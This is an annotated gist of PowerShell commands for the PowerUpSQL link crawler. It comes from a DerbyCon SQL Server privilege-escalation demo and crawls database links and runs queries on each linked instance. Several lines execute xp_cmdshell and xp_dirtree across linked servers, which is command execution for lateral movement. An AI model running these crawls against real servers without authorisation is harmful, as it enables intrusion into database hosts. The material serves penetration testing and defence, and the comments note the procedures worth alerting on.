Forked from nullbind/DerbyCon2016 - SQL Server Privilege Escalation Demo - Database Links
DerbyCon2016 - SQL Server Privilege Escalation Demo - Database Links
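# Example invocations of the PowerUpSQL link crawler (Get-SqlCrawl / Get-SQLCrawl;
# PowerShell command names are case-insensitive, so both spellings below are the
# same command). Each call connects to the named instance and, per the gist title,
# follows its database links. Stray "| |" gutter residue from the rendered page has
# been stripped from every line; the commands themselves are unchanged.

# Import the module from a fixed local checkout path.
Import-Module C:\PowerUpSQL-master\scripts\Get-SqlServerLinkCrawl.ps1

# Crawling Links - this shows link paths in output.
# NOTE(review): this and the next command both write C:\PowerUpSQL-master\crawl2.xml,
# so running them back to back overwrites the first export.
Get-SqlCrawl -Verbose -Instance MSSQLSRV04.demo.local\SQLSERVER2014 -Export | Export-Clixml C:\PowerUpSQL-master\crawl2.xml

# Crawling Links - this will store link paths in an array so they can be used in different ways.
Get-SqlCrawl -Verbose -Instance MSSQLSRV04.demo.local\SQLSERVER2014 | Export-Clixml C:\PowerUpSQL-master\crawl2.xml

# More Example commands below from Antti Rantasaari.
# -Query runs the given T-SQL on each reachable link; results are shaped with
# select / where / sort / format-table as ordinary PowerShell objects.
Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases"
Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" | select name,version,path,links,user,sysadmin,customquery | format-table
Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" | where name -ne "Broken Link" | select name,version,path,links,user,sysadmin,customquery | format-table
# The two queries below execute OS-level functionality (xp_cmdshell, xp_dirtree) on every
# link reached; from a monitoring standpoint these procedures are worth alerting on,
# especially when invoked through a linked-server context.
Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "exec master..xp_cmdshell 'whoami'" | format-table
Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "exec xp_dirtree 'c:\temp'" -Export | format-table
# NOTE(review): the trailing "Format" is not a cmdlet on its own; the original line
# appears truncated (the sibling examples use format-table) - confirm against the source.
Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" -Export | where name -ne "broken link" | sort name | Format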